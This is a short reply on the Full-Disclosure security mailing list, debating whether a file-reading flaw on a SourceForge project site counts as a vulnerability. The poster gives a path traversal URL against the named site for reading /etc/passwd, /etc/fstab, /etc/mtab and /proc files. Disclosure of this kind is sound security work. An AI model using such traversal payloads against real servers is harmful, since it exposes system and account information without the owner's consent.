Hi, > It's not a mis-configuration, this does not allow you to look at any > secret file, only the files that the user nobody can read.
this not vulnerability.. only read system (capture for attack??).... I sugestion for (others) administrator test/verify if missing configuration in yours self... ;) http://btmgr.sourceforge.net/index.php3?body=../../../../../../proc/{cpuinfo,version,... /etc/passwd, /etc/{fs,mtab and etc.. information into site... good /proc/uptime this machine ;) Buick Sk _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html